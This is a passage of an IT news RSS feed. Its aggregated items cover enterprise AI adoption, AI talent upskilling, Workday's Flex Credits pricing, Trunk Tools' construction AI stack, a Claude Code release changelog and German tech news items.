rapidly without manual migrations. The platform pairs that flexibility with a typed schema layer on top, a deliberate architectural decision. </p><p>“MongoDB’s document model enables us to both keep things simple and at the same time decide how structured we want everything to be," Shatakhtsyan says. We still add a typed schema on top, which tremendously improves the accuracy at which AI can generate fully working, reliable web apps."</p><p>The TypeScript integration has been especially consequential, he adds. </p><p>“Because MongoDB types and values can be directly translated to TypeScript, it becomes an extension of the Modelence framework and our App Builder has a single source of truth for both app logic and database,” Shatakhtsyan explains.</p><p>The result is a platform that can move from planning to a running live feature in minutes with significantly fewer regressions. That speed and reliability helped Modelence raise $3 million in seed funding and successfully launch an AI-native app builder that handles the entire application lifecycle end-to-end.</p><h2>Tavily: The web access layer for agents     </h2><p>Tavily is the search API purpose-built for AI agents, connecting them to real-time, accurate web knowledge and keeping them grounded in what's actually happening, not in static training data. At Tavily's scale, every agent request authenticates, retrieves, and meters without friction. That demanded backend infrastructure built to absorb change without breaking.</p><p>“On the user side, every agent request authenticates and meters against it," says Tomer Weiss, Data Team Lead at Tavily. "On the data side, we use it to track the lifecycle of every document we’ve ever touched: when it was fetched, how stale it is, what the freshness signals were and how popular it is. MongoDB’s flexible schema let us keep evolving those records without migrations as new metrics and features came along.”</p><p>That living record is what keeps agents grounded in reality. Multi-tenancy at Tavily's scale means managing millions of API keys, distinct usage profiles, plan tiers, and regional residency requirements. They built for that complexity from day one. </p><p>“We separated concerns across clusters early: a user/account cluster optimized for low-latency authentication and usage writes, and a sharded cluster for document state where the scaling axis is URLs, not users," Weiss explains. "That separation has paid off.”</p><p>The most critical lesson is about choosing infrastructure that doesn’t punish change, and that flexibility compounds, he says. </p><p>"The AI space moves so fast that change is our norm," he explains.  "For a company serving AI agents, where the workloads themselves keep changing shape, choosing a data platform that doesn’t punish change has turned out to be more valuable than any single feature.”
</p><h2>Huntr: From job tracker to AI career platform</h2><p>Huntr.co, an AI resume building and tailoring platform, helps more than 500,000 job seekers across 190 countries craft stronger applications and manage their search. For a lean, three-person engineering team, the challenge was finding a data foundation flexible enough to store the full complexity of a person’s career history in a structure that AI could read, reason about, and generate from natively.</p><p>“The kinds of career data we are gathering at Huntr naturally aligns with MongoDB’s document model," says Trevor McCann, senior software engineer at Huntr. "The core problem we’re solving with AI job search tools is how to surface the qualities of a candidate that make them unique. We need to be ready to store whatever kinds of data the candidate wants to include in their materials.”</p><p>Huntr built its AI Resume Builder on MongoDB Atlas, where the document model mirrors the natural shape of career data: deeply nested, variable across candidates, and constantly evolving as the platform ships new features. MongoDB Search on Atlas handles core search needs while MongoDB Vector Search powers the <a href="https://huntr.co/product/resume-tailor"><u>Job Tailoring</u></a> feature, which puts a candidate’s stored career profile side by side a specific job description and uses semantic matching to generate a resume optimized for that role.</p><p>The integrated capabilities have had a direct impact on how quickly the team can ship, McCann says. </p><p>“MongoDB’s hybrid search allows us to seamlessly query across literal and semantic text matches, a must-have when working with such diverse data,” McCann says. “This is something we could piece together using other solutions but with MongoDB it’s ready to go on top of our existing data layer.”
The consolidation of database, search, and vector capabilities into a single platform is what allows the team to punch above its weight. Huntr considers MongoDB the fourth member of its engineering team, McCann adds. </p><p>Looking ahead, the platform is building toward AI that learns from a candidate’s full professional history over time, delivering more personalized guidance with every interaction.</p><h2>The digital native blueprint</h2><p>These success stories become a definitive "digital native blueprint" for the agentic era, built on three core pillars. First, by unifying database, search, and vector storage into a single platform, these startups have effectively eliminated the architectural tax of complex data schemas that typically slows down development. This consolidation enables a level of fluidity that is now non-negotiable; AI agents require a modern data platform that can adapt as quickly as a natural language prompt evolves. </p><p>The winners of the AI era will be the ones who build the most performant, durable, and flexible systems to support those models in production. As agentic workflows grow more sophisticated, the data foundation determines how fast a team can ship, how reliably agents can operate, and how quickly the platform can adapt when the landscape shifts again. </p><hr><p><i>Sponsored articles are content produced by a company that is either paying for the post or has a business relationship with VentureBeat, and they’re always clearly marked. For more information, contact </i><a href="mailto:sales@venturebeat.com"><i><u>sales@venturebeat.com</u></i></a><i>.</i>
</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Build or buy? Smart CIOs know the answer for AI talent]]></title>
<description><![CDATA[The key ingredient for successful AI deployment is largely becoming the talent available, not the AI tools installed, putting pressure on IT leaders to upskill their workforces.



With AI skills both the highest in demand and the hardest to hire for, many IT leaders and their C-suite colleagues ...]]></description>
<link>https://tsecurity.de/de/3651103/it-security-nachrichten/build-or-buy-smart-cios-know-the-answer-for-ai-talent/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651103/it-security-nachrichten/build-or-buy-smart-cios-know-the-answer-for-ai-talent/</guid>
<pubDate>Tue, 07 Jul 2026 12:08:33 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>The key ingredient for successful AI deployment is largely becoming the talent available, not the AI tools installed, putting pressure on IT leaders to upskill their workforces.</p>



<p>With AI skills both the <a href="https://www.cio.com/article/4096592/the-10-hottest-it-skills-for-2026.html">highest in demand</a> and <a href="https://www.cio.com/article/4184685/the-11-hardest-it-roles-to-fill-in-2026-and-whats-changed.html">the hardest to hire for</a>, many IT leaders and their C-suite colleagues are rolling out comprehensive <a href="https://www.cio.com/article/4100412/it-talent-heres-how-cios-curate-engagement-and-retention.html?utm=hybrid_search">AI training programs</a> for employees, both for the IT pros who build AI tools and the business users who will use them.</p>



<p>Smart companies will need to invest heavily in upskilling, says <a href="https://www.devry.edu/newsroom/administration/chris-campbell.html" rel="nofollow">Chris Campbell</a>, CIO at DeVry University. “The pace of change is simply too fast to rely solely on external hiring,” he says. “Organizations that develop AI capabilities across their existing workforce will have an advantage over those trying to win a bidding war for a relatively small pool of experts.”</p>



<p>Moreover, the key elements of what leads to a beneficial AI deployment has changed over time, he says.</p>



<p>“Early on, everyone was worried about access to AI tools,” Campbell adds. “Today, the tools are everywhere. What I see organizations struggling with is figuring out how to apply them to real business problems and integrate them into how work actually gets done.”</p>



<p>At DeVry, some of the strongest AI advocates don’t come from traditional AI backgrounds, but from software engineering, business analysis, cybersecurity, project management, and operations, he says.</p>



<p>“They understand the business, know where the friction points are, and can see where AI can create value,” he adds. “Those skills are often more important than deep expertise in a particular model or tool.”</p>



<p>Experienced <a href="https://www.cio.com/article/230935/hiring-the-most-in-demand-tech-jobs-for-2021.html">AI talent is difficult to find</a>, especially when IT leaders seek candidates who have successfully transitioned AI initiatives from experimentation to production.</p>



<p>“I don’t think every company needs to build a large team of AI specialists,” Campbell says. “In many cases, the people best positioned to drive AI adoption are already inside the organization.”</p>



<h2 class="wp-block-heading">Upskilling for an AI builder culture</h2>



<p>Professional services and accounting firm KPMG is addressing its AI talent challenge by providing widespread AI training to employees, says <a href="https://www.linkedin.com/in/rema-serafi/" rel="nofollow">Rema Serafi</a>, vice chairwoman for tax operations there. Many organizations’ major AI problem in 2026 is a lack of talent, not a lack of technology, she adds.</p>



<p>Forty percent of CIOs surveyed for this year’s <a href="https://us.resources.cio.com/resources/state-of-the-cio/" rel="nofollow">State of the CIO report</a> cited <a href="https://www.cio.com/article/4165232/whats-holding-back-enterprise-ai-shortage-of-talent-cios-say.html">lack of in-house talent as a top impediment</a> to implementing their AI strategies.</p>



<p>To address this, KPMG has piloted a six-week AI training program, with the goal of enabling all employees to deploy their own AI tools, Serafi says. The program familiarizes employees with Python and other technologies that serve as building blocks for internal AI tools, she says.</p>



<p>KPMG also revamped its team structures to ensure that three categories of employees — AI power users, makers, and builders — work closely together, says Serafi.</p>



<p>“Everyone’s going to have access to our tools, and everyone’s going to be a power user,” she says, “to the extent that those professionals who didn’t come in with AI capabilities, who didn’t come in as engineers or technologists, if they want to learn, we’re going to certify them to build tools as well.”</p>



<p>Deploying sophisticated, best-in-class AI tools without training employees is like buying an F1 racing car but not hiring a professional driver, she says.</p>



<p>“If we don’t have professionals who know how to use it, they’re not going to be able to maximize the benefit of what’s available to them,” Serafi adds.</p>



<p>KPMG commissioned a study with the University of Texas and found that employees who use AI regularly produce higher-quality work and feel less stressed. Employees who are expert users of AI will progress faster in their careers, she suggests. One challenge for training programs, though, is keeping up with how fast AI is evolving.</p>



<p>“The roles are actually changing in a short period of time,” she says. “When you used to see traditional engineers working with AI, now you see professionals who can actually guide, shape, and direct AI in their client work.”</p>



<h2 class="wp-block-heading">Retraining: ‘The only realistic path forward’</h2>



<p>Another fan of comprehensive AI training for employees is <a href="https://www.linkedin.com/in/elmerm/" rel="nofollow">Elmer Morales</a>, founder and CEO of agentic AI coding startup koder.com. Finding outside AI talent has become extremely difficult for most companies, he says.</p>



<p>“Retraining isn’t optional anymore,” he says. “It’s the only realistic path forward for most organizations. The external talent market can’t supply what every company simultaneously needs, and waiting for universities to catch up isn’t a strategy.”</p>



<p>Companies that succeed with AI treat upskilling as a core investment, not just an HR initiative, Morales adds.</p>



<p>“The talent gap is the single most concrete ceiling on AI ambition right now,” he says. “Companies can buy the best models, the best infrastructure, and the best tooling, and still produce nothing of value because they don’t have the people who know how to wire it all together into something that actually works in production.”</p>



<p>Morales suggests that IT leaders look to their existing engineering team to build AI deployment talent.</p>



<p>“The engineers already obsessed with this on nights and weekends, who are shipping personal projects and experimenting with new models, those people just need permission, resources, and a real problem to solve,” he says. “The best AI teams I’ve seen weren’t built by recruiting, but by creating the conditions for the right people to step forward.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Communities verbinden! (ds2010)]]></title>
<description><![CDATA[2 Jahre Regionales LUG-Treffen Berlin/Brandenburg im Rückblick.

Im Großraum Berlin, Potsdam und Brandenburg existieren unzählige Linux User Groups (LUG), die bisher eher für sich und nur in ihrem Stadtteil agiert haben. Der Austausch zwischen den einzelnen LUGs fand überwiegend online statt, d.h...]]></description>
<link>https://tsecurity.de/de/3650084/it-security-video/communities-verbinden-ds2010/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3650084/it-security-video/communities-verbinden-ds2010/</guid>
<pubDate>Tue, 07 Jul 2026 01:17:50 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[2 Jahre Regionales LUG-Treffen Berlin/Brandenburg im Rückblick.

Im Großraum Berlin, Potsdam und Brandenburg existieren unzählige Linux User Groups (LUG), die bisher eher für sich und nur in ihrem Stadtteil agiert haben. Der Austausch zwischen den einzelnen LUGs fand überwiegend online statt, d.h. über Mailinglisten, IRC oder Jabber. 

Um eine stärkere Vernetzung untereinander zu erreichen, wurde von mir 2008 das Regionaltreffen Berlin und dem Berliner Umland ins Leben gerufen. Alle Interessenten aus den verschiedenen OpenSource-Strömungen sind zu 
diesen Treffen eingeladen, um sich dabei persönlich kennenzulernen und um miteinander Wissen und Neuigkeiten auszutauschen.

In diesem Beitrag blicke ich auf zwei Jahre LUG-Treffen zurück, berichte über Erfolge und Erlebnisse und möchte damit zu ähnlichen Treffen in der Region anregen.
about this event: https://datenspuren.de/2010/fahrplan/event/4022.de.html]]></content:encoded>
</item>
<item>
<title><![CDATA[Communities verbinden! (ds2010)]]></title>
<description><![CDATA[2 Jahre Regionales LUG-Treffen Berlin/Brandenburg im Rückblick.

Im Großraum Berlin, Potsdam und Brandenburg existieren unzählige Linux User Groups (LUG), die bisher eher für sich und nur in ihrem Stadtteil agiert haben. Der Austausch zwischen den einzelnen LUGs fand überwiegend online statt, d.h...]]></description>
<link>https://tsecurity.de/de/3650068/it-security-video/communities-verbinden-ds2010/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3650068/it-security-video/communities-verbinden-ds2010/</guid>
<pubDate>Tue, 07 Jul 2026 01:03:26 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[2 Jahre Regionales LUG-Treffen Berlin/Brandenburg im Rückblick.

Im Großraum Berlin, Potsdam und Brandenburg existieren unzählige Linux User Groups (LUG), die bisher eher für sich und nur in ihrem Stadtteil agiert haben. Der Austausch zwischen den einzelnen LUGs fand überwiegend online statt, d.h. über Mailinglisten, IRC oder Jabber. 

Um eine stärkere Vernetzung untereinander zu erreichen, wurde von mir 2008 das Regionaltreffen Berlin und dem Berliner Umland ins Leben gerufen. Alle Interessenten aus den verschiedenen OpenSource-Strömungen sind zu 
diesen Treffen eingeladen, um sich dabei persönlich kennenzulernen und um miteinander Wissen und Neuigkeiten auszutauschen.

In diesem Beitrag blicke ich auf zwei Jahre LUG-Treffen zurück, berichte über Erfolge und Erlebnisse und möchte damit zu ähnlichen Treffen in der Region anregen.
about this event: https://datenspuren.de/2010/fahrplan/event/4022.de.html]]></content:encoded>
</item>
<item>
<title><![CDATA[v2.1.202]]></title>
<description><![CDATA[What's changed

Added a "Dynamic workflow size" setting in /config for controlling how large Claude generally makes dynamic workflows (small/medium/large agent counts) — an advisory guideline, not an enforced cap
Added workflow.run_id and workflow.name OpenTelemetry attributes to telemetry emitte...]]></description>
<link>https://tsecurity.de/de/3650062/downloads/v21202/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3650062/downloads/v21202/</guid>
<pubDate>Tue, 07 Jul 2026 01:02:00 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's changed</h2>
<ul>
<li>Added a "Dynamic workflow size" setting in <code>/config</code> for controlling how large Claude generally makes dynamic workflows (small/medium/large agent counts) — an advisory guideline, not an enforced cap</li>
<li>Added <code>workflow.run_id</code> and <code>workflow.name</code> OpenTelemetry attributes to telemetry emitted by workflow-spawned agents, so a workflow run's activity can be reconstructed from OTel data</li>
<li>Fixed a crash in the inline Ctrl+R history search when accepting or cancelling while the search was still scanning the history file</li>
<li>Fixed <code>/rename</code> on background sessions being reverted when the job restarts, which broke addressing the session by its new name</li>
<li>Fixed transient mTLS handshake failures when settings were re-applied during an in-place client certificate rotation</li>
<li>Fixed commands sent from Remote Control (mobile/web) into an interactive session failing with "Unknown command"</li>
<li>Fixed images and files sent from the Remote Control mobile or web app without a caption being silently dropped</li>
<li>Fixed the sign-in URL printed by <code>claude auth login</code> and <code>claude mcp login --no-browser</code> not being reliably clickable when it wraps over SSH — it is now emitted as a single hyperlink</li>
<li>Fixed opening a chat from <code>claude agents</code> sometimes failing with "currently running as a background agent" followed by a worker crash/respawn loop</li>
<li>Fixed workflow scripts with unicode quote escapes in strings being corrupted before parsing; workflow parse errors now show the offending line instead of always blaming TypeScript</li>
<li>Fixed voice dictation retrying in an unbounded loop when the microphone or audio recorder fails — repeated capture failures now pause voice input</li>
<li>Fixed <code>/remote-control</code> sessions showing the wrong permission mode in the mobile and web apps</li>
<li>Fixed resuming a session by name, or opening the resume picker, taking minutes and using a large amount of memory in repositories with many git worktrees</li>
<li>Fixed installer and updater downloads failing immediately with "aborted" when a proxy or network drops the connection mid-download — transient connection drops now retry</li>
<li>Fixed re-invoking an already-loaded skill appending a duplicate copy of its instructions to context</li>
<li>Improved <code>/workflows</code> agent list layout: wider titles, a dedicated time column, shorter model names, and no per-row tool-call counts</li>
<li>Improved MCP error messages: clearer error when a server config has <code>url</code> but no <code>type</code>, suggesting <code>"type": "http"</code> instead of the misleading "command: expected string"</li>
<li>Changed <code>/review &lt;pr&gt;</code> back to a fast single-pass review; use <code>/code-review &lt;level&gt; &lt;pr#&gt;</code> for the multi-agent review at a chosen effort level</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Data Scientists Are Becoming AI Managers, Not Model Builders]]></title>
<description><![CDATA[The role is shifting from building models to managing them.]]></description>
<link>https://tsecurity.de/de/3649321/ai-nachrichten/data-scientists-are-becoming-ai-managers-not-model-builders/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3649321/ai-nachrichten/data-scientists-are-becoming-ai-managers-not-model-builders/</guid>
<pubDate>Mon, 06 Jul 2026 18:24:56 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The role is shifting from building models to managing them.]]></content:encoded>
</item>
<item>
<title><![CDATA[Mecklenburg-Vorpommern streicht jetzt erste Microsoft-Cloud-Dienste]]></title>
<description><![CDATA[Mecklenburg-Vorpommern reduziert seine Abhängigkeit von US-Tech-Konzernen und setzt in der Verwaltung verstärkt auf Open-Source-Lösungen. Während Cloud-Dienste und KI europäisch werden, bleibt ein komplettes Microsoft-Aus vorerst aus.			(Weiter lesen)]]></description>
<link>https://tsecurity.de/de/3645063/it-security-nachrichten/mecklenburg-vorpommern-streicht-jetzt-erste-microsoft-cloud-dienste/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3645063/it-security-nachrichten/mecklenburg-vorpommern-streicht-jetzt-erste-microsoft-cloud-dienste/</guid>
<pubDate>Sat, 04 Jul 2026 10:53:32 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<a href="https://winfuture.de/news,159768.html"><img hspace="5" border="0" align="left" alt="Open Source, Sourcecode, Opensource, Source Code, Open Source Software, Quelloffen, Quelltext" width="1920" height="1080" src="https://i.wfcdn.de/teaser/1920/56862.jpg"></a>
			Mecklenburg-Vorpommern reduziert seine Abhängigkeit von US-Tech-Konzernen und setzt in der Verwaltung verstärkt auf Open-Source-Lösungen. Während <a href="https://winfuture.de/special/cloud/" title="Cloud Special">Cloud-Dienste</a> und KI europäisch werden, bleibt ein komplettes Microsoft-Aus vorerst aus.			(<a href="https://winfuture.de/news,159768.html">Weiter lesen</a>)]]></content:encoded>
</item>
<item>
<title><![CDATA[Unpacking Workday’s agentic AI pricing model]]></title>
<description><![CDATA[Only 35% of CIOs have full visibility into their AI operating costs, according to a recent KPMG survey. That makes it difficult for them to control spend on software-as-a-service offerings from vendors who, like Workday, have incorporated pay-as-you-go agentic AI into their offerings. Workday is ...]]></description>
<link>https://tsecurity.de/de/3644080/it-nachrichten/unpacking-workdays-agentic-ai-pricing-model/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3644080/it-nachrichten/unpacking-workdays-agentic-ai-pricing-model/</guid>
<pubDate>Fri, 03 Jul 2026 19:04:16 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Only 35% of CIOs have full visibility into their AI operating costs, according to a recent KPMG survey. That makes it difficult for them to control spend on software-as-a-service offerings from vendors who, like Workday, have incorporated pay-as-you-go agentic AI into their offerings. Workday is one of several vendors that have shifted to a <a href="https://www.cio.com/article/4057792/workday-unveils-new-agents-a-new-cloud-and-a-developer-platform.html">hybrid subscription/consumption pricing model</a>.</p>



<p>“Fundamentally, with AI we are shifting the value of what enterprise software as a service is delivering in the industry,” Workday CTO Gabe Monroy explained in a recent interview. “The key, though, is that the value is no longer derived by a fixed factor, like how many employees you have working for you. It’s now going to be derived by how much use are you getting out of the system, hence the consumption.”</p>



<p>However, “It’s going to be in some cases disruptive to our customers, and it’s incumbent on us to provide them with tools to forecast and navigate that transition effectively,” he said.</p>



<p>That will be welcome news for the 40% of organizations that <a href="https://assets.kpmg.com/content/dam/kpmgsites/xx/pdf/2026/06/global-ai-pulse-q2.pdf.coredownload.inline.pdf" target="_blank" rel="nofollow">KPMG found</a> have usage or token budgets in place.</p>



<p>The changes Monroy described are part of an industry trend, according to <a href="https://www.infotech.com/profiles/terra-higginson" target="_blank" rel="nofollow">Terra Higginson</a>, principal research director at Info-Tech Research Group. “What we are seeing in the market is that basic seat pricing and seat counts are not going away. Customers are still paying for the core subscription footprint. AI is being layered on top as an incremental cost,” she said. “The practical message is simple: expect to pay more. The pricing model may shift from seats to credits or consumption, but the direction of spend is still up.”</p>



<p>And because each vendor’s program has its own twists and its own ways of measuring and charging for usage, every new model adds a layer of complexity to the budgeting headaches CIOs already face thanks to the ongoing move to consumption-based services, which began with the cloud.</p>



<h2 class="wp-block-heading">Two parts to the model</h2>



<p>Workday’s AI pricing model is in two parts. First, customers subscribe to the services they want, as they always have. With that subscription, they receive a pool of Flex Credits that can be used to enable AI agents and other “applicable platform capabilities” including Agent-Ready Tools, Workday Data Cloud, and high-volume use of <a href="https://www.cio.com/article/4146511/workday-integrates-sana-to-turn-its-enterprise-apps-into-agentic-execution-engines.html">Sana through its conversational AI interface</a>. The number of credits included varies by company size. But on top of that, they also purchase a subscription for additional Flex Credits that can be applied to any product they subscribe to.</p>



<p>Flex Credit usage is monitored through the Platform Consumption Console, which generates alerts when consumption hits 80%, 90% and 100% of subscribed credits. Use is metered when a task is completed.</p>



<p>However, one Flex Credit doesn’t necessarily equal one action. Workday’s <a href="https://www.workday.com/content/dam/web/en-us/documents/legal/flex-credits-rate-card.pdf" target="_blank" rel="nofollow">rate card</a> lists the number of credits per activity; for example, as of May 21, in the Recruiting Agent, it currently costs six credits to screen and grade each candidate’s resumé against a job opening, and 750 credits per requisition to identify relevant leads in existing talent pools and rediscover candidates for recruiters, recommending jobs for those candidates to apply for. In the Contract Negotiation Agent, the review and redlining of a contract, based on a playbook, costs 500 credits.</p>



<p>The company also provides a <a href="https://www.workday.com/content/dam/web/en-us/documents/legal/sana-platform-self-service-reference.pdf" target="_blank" rel="nofollow">reference guide</a> listing the credits used by actions performed by the Sana platform and by self-service agents.</p>



<p>The good news is that, though Workday’s console counts credits used in both production and pre-production environments, only those used in production are charged for, offering an early budgeting reality check and a chance to tweak processes before they land in production. Pre-production usage count is only in aggregate, however, so if a customer wants to size a specific agent, the best approach is to run it in a defined window or dedicated test tenant and compare usage before and after the test<em>.</em></p>



<h2 class="wp-block-heading">Use them or lose them</h2>



<p>The bad news is that Flex Credits expire after one year, and any left in a subscription do not roll over to the next; it’s a use them or lose them situation.</p>



<p>If, on the other hand, a customer exceeds their Flex Credit balance during the year, Workday said it does not just turn off their agents or other access to services. Instead, Workday’s account teams “partner with them to reconcile usage and help them purchase additional credits.”</p>



<p>Analysts agree that there are pros and cons to this new market reality.</p>



<p>“Workday’s Flex Credits are part of a broader shift we’re seeing across SaaS,” said <a href="https://moorinsightsstrategy.com/team/melody-brue/" target="_blank" rel="nofollow">Melody Brue</a>, principal analyst at Moor Insights &amp; Strategy. “Vendors are defining their own proprietary units for AI consumption so they can meter usage on top of existing subscriptions.”</p>



<p>Workday’s model, she said, is more flexible than a static AI add-on because customers can use Flex Credits for whichever agents drive the most value at a given time and get access to new AI capabilities as they launch.</p>



<p>The trade-off, however, is predictability. “Credit burn rates vary widely by task,” she said. A pilot can quietly consume a year’s worth of Flex Credits within weeks without strong telemetry and governance. And that, she said is what worries technology and finance leaders: apparently successful AI adoption that shows up as a budget surprise.</p>



<p>But, said <a href="https://www.infotech.com/profiles/scott-bickley" target="_blank" rel="nofollow">Scott Bickley</a>, advisory fellow at Info-Tech Research Group, “The Workday Flex Credits Rate Card seeks to quantify consumption of Flex Credits to specific value-added actions that are AI agent-driven. Many other vendors in the ERP space have created incredibly complex, multi-layered consumption models, leaving their customers’ heads spinning as they seek to decipher how capacity will be consumed, much less if it can add value.”</p>



<p>Brue, too, approved of Workday’s model, although she said that a core issue with AI pricing today is that <a href="https://www.cio.com/article/4138622/awu-by-salesforce-a-shiny-new-metric-that-tells-cios-little-of-value.html">vendors are each defining their own units</a>, with no common measurement across platforms. This gives vendors pricing flexibility, but makes customers do extra work to create meaningful metrics like cost per resolution or cost per process run, just to keep budgets and ROI under control.</p>



<p>“Workday’s Flex Credits are a smart move for Workday because they align revenue with AI usage, but from the buyer’s side, they raise the bar on FinOps and governance,” she said. “You need clear dashboards, guardrails, and forecasting, or that flexibility can quickly turn into a budget black hole.”</p>



<p></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Trunk Tools' stack cut document review from 60 days to 10 by ditching general-purpose models]]></title>
<description><![CDATA[Most verticals aren’t clean, well-oiled SaaS databases; the reality is ugly documents, proprietary schemas, implicit workflows, and long‑running tasks that most general-purpose models struggle with. This prompted construction project management company Trunk Tools to build a specialized, three-la...]]></description>
<link>https://tsecurity.de/de/3643726/it-nachrichten/trunk-tools-stack-cut-document-review-from-60-days-to-10-by-ditching-general-purpose-models/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3643726/it-nachrichten/trunk-tools-stack-cut-document-review-from-60-days-to-10-by-ditching-general-purpose-models/</guid>
<pubDate>Fri, 03 Jul 2026 15:46:52 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Most verticals aren’t clean, well-oiled SaaS databases; the reality is ugly documents, proprietary schemas, implicit workflows, and long‑running tasks that most general-purpose models struggle with. </p><p>This prompted construction project management company Trunk Tools to build a specialized, three-layer architecture — perception, semantics, agents — based on highly-detailed data to support high-accuracy, highly-relevant industry automation.</p><p>Their purpose-built stack has shrunk review cycles from months to days, prevented costly field errors, and given autonomous agents the ability to reason over millions of pages of documentation, Trunk says. </p><p>“We really set out to take the data from dispersed systems, pre-process it, structure it, go through our ontology into a knowledge graph, and then train AI models,” said Sarah Buchner, Trunk’s founder and CEO and a former carpenter. </p><p>For builders in other verticals, Trunk’s approach could serve as a blueprint for transforming data chaos into agent‑ready, industry-specific workflows. </p><h2>Where general-purpose LLMs break down on industry data </h2><p>Foundation LLMs, while powerful, are optimized for breadth, not always depth. </p><p>“General-purpose LLMs are trained to be okay at everything, so they're weak at anything niche,” said Kriti Faujdar, a senior product manager working in AI infrastructure, agentic AI, security, and LLM platforms. For instance: Rare terms, domain-specific reasoning, the unspoken context that any practitioner “just knows.” </p><p>Web, app, and software developer Sébastien De Bollivier agreed that the biggest bottleneck is reliability on data that is “jargon-dense, abbreviation-heavy, and format-specific.” </p><p>“A GPT-4-class model can understand a French legal contract, but will fumble the specific article references practitioners need to cite,” he said. </p><p>Besides, the most valuable enterprise data never made it into pretraining anyway, Faujdar pointed out. It's sitting in internal systems and proprietary formats. “RAG helps a little,” she said. “But it's just giving better facts to a model that still can't reason properly in the domain.”</p><p>Pre-training on domain data is critical; enterprises should then fine-tune on good task examples and build their own evals. “A few thousand examples from real practitioners beats millions of scraped, noisy ones," Faujdar said. </p><p>Mixture-of-experts (MoE) can provide specialization without inference costs blowing up. Pairing RAG with fine-tuning also works well; RAG handles the factual long trail while fine-tuning fixes vocabulary and reasoning.</p><p>De Bollivier pointed to the advantage of hybrid stacks: A general-purpose model for reasoning and orchestration, a smaller fine-tuned model (or dense retrieval over a curated corpus) for domain-specific extraction. He advised: “Don't fine-tune to make the model 'smarter' about a domain, fine-tune to make it more reliable on the specific output format your workflow requires.”</p><p>The trades and construction are certainly industries seeing traction with these techniques, as are legal and healthcare, De Bollivier said. These verticals have “high stakes for errors plus standardized document formats, equaling clear domain-training ROI.”</p><p>One honest caveat worth mentioning, Faujdar said: Specialized models can often fall apart outside their domain, so they’re often not useful outside their expertise (unless they’re re-trained). </p><h2>Perception, semantics, agents: inside Trunk's three-layer stack</h2><p>In highly-specialized domains like construction, “data dumps” into large language models (LLMs) don’t cut it, said Trunk’s CTO Amrish Kapoor. This is because most transformers are probabilistic models: When given an image, they report back that it is “probably” a tree, or “probably” a child playing next to a tree. </p><p>This makes them insufficient for high‑precision symbolic interpretation. For instance, in construction documents, a 2-millimeter-wide symbol has a vastly different meaning depending on where it’s placed. </p><p>Further, constrained by context limits, probabilistic models struggle with long‑term project memory. “I don't mean a context window of a few tokens,” Kapoor said. “I'm talking about long term memory that stretches across months and years, because this is how long some of these projects are.”</p><p>Instead, Trunk’s three-layer system breaks workflows into: </p><ul><li><p>Perception (reading and extracting data from messy docs like PDFs, drawings, or scans)</p></li><li><p>A semantic/graph layer (making sense of that data and understanding their relationships).</p></li><li><p>LLMs and agents on top.</p></li></ul><p>Construction drawings are typically symbolic, Buchner said. A door isn't always labeled ‘door.’ Sometimes it's simply an arc on a wall that a trained eye learns to read based on years of practice. </p><p>“The perception layer is what teaches AI to read that language,” she said. The semantic layer then gives that information meaning; for instance, connecting the door to the drawing that details it, the spec that governs it, and the trade that installs it. This helps answer project engineers’ critical questions: Not "is there a door here?" but "does this door create a problem down the line?"</p><p>Particularly in construction, that shift matters because the cost of a problem compounds with time. “A conflict caught in design is relatively low cost to address,” Buchner said, “whereas the same problem caught in the field might cost tens of thousands of dollars.” </p><p>At a high level, the system identifies the document type and begins extracting information based on content (drawing, schedules, paragraph text). This data is then “transformed and augmented” in the platform, which triggers agentic workflows like knowledge graph relationships and end-user workflows. </p><p>For instance, an agent might review an architecture bulletin and produce a visual overlay comparing an older version and a newer version (flagging additions and removals), then generate written narratives that describe what those changes are in simple terms. This helps users understand what’s changed and coordinate with trade partners on updated pricing and change orders. </p><h2>The scale of construction’s data problem</h2><p>Construction workflows are “ripe with implicit assumptions and connections between data in its myriad of sources,” Buchner said. And the amount of unstructured data is “humanly impossible” to process or make sense of.</p><p>Buchner estimated the average high-rise building generates about 3.6 million pages of corresponding documentation. “If you print it into a stack of papers it would be as high as the building itself.” </p><p>All three layers of Trunk’s stack — perception, semantic, LLM — are trained on “very specific datasets” from customers with “explicit permissions” and auto‑labeling/IP, Kapoor explained. Customers who don’t want Trunk training on their data can opt out. </p><p>Data is deidentified and aggregated, and Trunk also collects “tons more” labeled data through other pipelines like 3D building information modeling (BIM). </p><p>Trunk says it only ships agents that achieve around 95% accuracy. The team maintains continuous evaluation pipelines based on ground 